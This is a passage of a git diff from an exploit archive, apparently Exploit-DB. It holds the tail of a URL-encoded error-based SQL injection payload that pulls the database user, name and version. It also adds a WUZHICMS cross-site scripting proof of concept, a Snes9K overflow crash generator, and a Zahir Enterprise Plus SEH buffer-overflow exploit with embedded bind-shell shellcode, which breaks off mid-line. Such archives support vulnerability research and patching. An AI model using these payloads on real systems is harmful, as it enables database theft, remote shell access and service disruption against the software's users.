+%2c%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
\ No newline at end of file
diff --git a/exploits/php/webapps/45514.txt b/exploits/php/webapps/45514.txt
new file mode 100644
index 000000000..d5c573439
--- /dev/null
+++ b/exploits/php/webapps/45514.txt
@@ -0,0 +1,16 @@
+# Title: WUZHICMS 2.0 - Cross-Site Scripting
+# Author: Felipe "Renzi" Gabriel
+# Date: 2018-10-01
+# Vendor: http://www.wuzhicms.com
+# Software: WUZHICMS 2.0
+# CVE: CVE-2018-17832
+
+# Technical Details & Description:
+# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application.
+# The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request.
+
+# PoC
+
+http://Target/index.php?v=">
+
+http://Target/index.php?f=">
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45504.py b/exploits/windows_x86/local/45504.py
new file mode 100755
index 000000000..beab18707
--- /dev/null
+++ b/exploits/windows_x86/local/45504.py
@@ -0,0 +1,20 @@
+# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC)
+# Date: 2018-09-28
+# Exploit Author: crash_manucoot
+# Vendor Homepage: https://sourceforge.net/projects/snes9k/
+# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
+# Version: 0.0.9z
+# Tested on: Windows 7 Home Premium x86 SPANISH
+# Category: Windows Local Exploit
+# How to use: open the program go to Netplay-Options-paste the contents of open.txt
+# in the Socket Port Number and Boom
+
+buffer = "A" * 260
+nseh = "B" * 4
+seh = "C" * 4
+junk = "D" * 300
+
+evil = buffer + nseh + seh + junk
+
+file = open('open.txt','w+')
+file.write(evil)
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45505.py b/exploits/windows_x86/local/45505.py
new file mode 100755
index 000000000..7f888fcb5
--- /dev/null
+++ b/exploits/windows_x86/local/45505.py
@@ -0,0 +1,86 @@
+# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
+# Google Dork: -
+# Date: 2018-09-28
+# Exploit Author: modpr0be
+# Vendor Homepage: http://www.zahiraccounting.com/
+# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
+# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
+# Tested on: Windows 7 x86/64bit
+# CVE : N/A
+# Category: local & privilege escalation
+#
+# Description
+# Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file.
+# The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which
+# caused the Zahir main program to crash.
+#
+# Credits to f3ci, who found the vulnerability.
+#
+# Proof of Concept
+#!/usr/bin/python
+
+import struct
+
+# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c' \
+# -n 20 -e x86/shikata_ga_nai -f python -v sc
+# we won't worry about the space, it's big enough!
+# badchars are 00,0a,0d,22,2c
+sc = ""
+sc += "\x92\x91\xf5\x99\x98\xf5\xd6\x48\x48\x3f\x2f\x99\x4a"
+sc += "\x42\x9f\x2f\x42\x43\x43\x42\xb8\x8c\xa3\xb1\xa0\xdd"
+sc += "\xc0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x53\x31\x43\x12"
+sc += "\x83\xc3\x04\x03\xcf\xad\x53\x55\x33\x59\x11\x96\xcb"
+sc += "\x9a\x76\x1e\x2e\xab\xb6\x44\x3b\x9c\x06\x0e\x69\x11"
+sc += "\xec\x42\x99\xa2\x80\x4a\xae\x03\x2e\xad\x81\x94\x03"
+sc += "\x8d\x80\x16\x5e\xc2\x62\x26\x91\x17\x63\x6f\xcc\xda"
+sc += "\x31\x38\x9a\x49\xa5\x4d\xd6\x51\x4e\x1d\xf6\xd1\xb3"
+sc += "\xd6\xf9\xf0\x62\x6c\xa0\xd2\x85\xa1\xd8\x5a\x9d\xa6"
+sc += "\xe5\x15\x16\x1c\x91\xa7\xfe\x6c\x5a\x0b\x3f\x41\xa9"
+sc += "\x55\x78\x66\x52\x20\x70\x94\xef\x33\x47\xe6\x2b\xb1"
+sc += "\x53\x40\xbf\x61\xbf\x70\x6c\xf7\x34\x7e\xd9\x73\x12"
+sc += "\x63\xdc\x50\x29\x9f\x55\x57\xfd\x29\x2d\x7c\xd9\x72"
+sc += "\xf5\x1d\x78\xdf\x58\x21\x9a\x80\x05\x87\xd1\x2d\x51"
+sc += "\xba\xb8\x39\x96\xf7\x42\xba\xb0\x80\x31\x88\x1f\x3b"
+sc += "\xdd\xa0\xe8\xe5\x1a\xc6\xc2\x52\xb4\x39\xed\xa2\x9d"
+sc += "\xfd\xb9\xf2\xb5\xd4\xc1\x98\x45\xd8\x17\x34\x4d\x7f"
+sc += "\xc8\x2b\xb0\x3f\xb8\xeb\x1a\xa8\xd2\xe3\x45\xc8\xdc"
+sc += "\x29\xee\x61\x21\xd2\x01\x2e\xac\x34\x4b\xde\xf8\xef"
+sc += "\xe3\x1c\xdf\x27\x94\x5f\x35\x10\x32\x17\x5f\xa7\x3d"
+sc += "\xa8\x75\x8f\xa9\x23\x9a\x0b\xc8\x33\xb7\x3b\x9d\xa4"
+sc += "\x4d\xaa\xec\x55\x51\xe7\x86\xf6\xc0\x6c\x56\x70\xf9"
+sc += "\x3a\x01\xd5\xcf\x32\xc7\xcb\x76\xed\xf5\x11\xee\xd6"
+sc += "\xbd\xcd\xd3\xd9\x3c\x83\x68\xfe\x2e\x5d\x70\xba\x1a"
+sc += "\x31\x27\x14\xf4\xf7\x91\xd6\xae\xa1\x4e\xb1\x26\x37"
+sc += "\xbd\x02\x30\x38\xe8\xf4\xdc\x89\x45\x41\xe3\x26\x02"
+sc += "\x45\x9c\x5a\xb2\xaa\x77\xdf\xc2\xe0\xd5\x76\x4b\xad"
+sc += "\x8c\xca\x16\x4e\x7b\x08\x2f\xcd\x89\xf1\xd4\xcd\xf8"
+sc += "\xf4\x91\x49\x11\x85\x8a\x3f\x15\x3a\xaa\x15"
+
+junk = "A" * 3041
+junk += '\n\r'
+junk += 'A' * 380
+junk += "\xeb\x08\x90\x90" # nseh
+junk += struct.pack('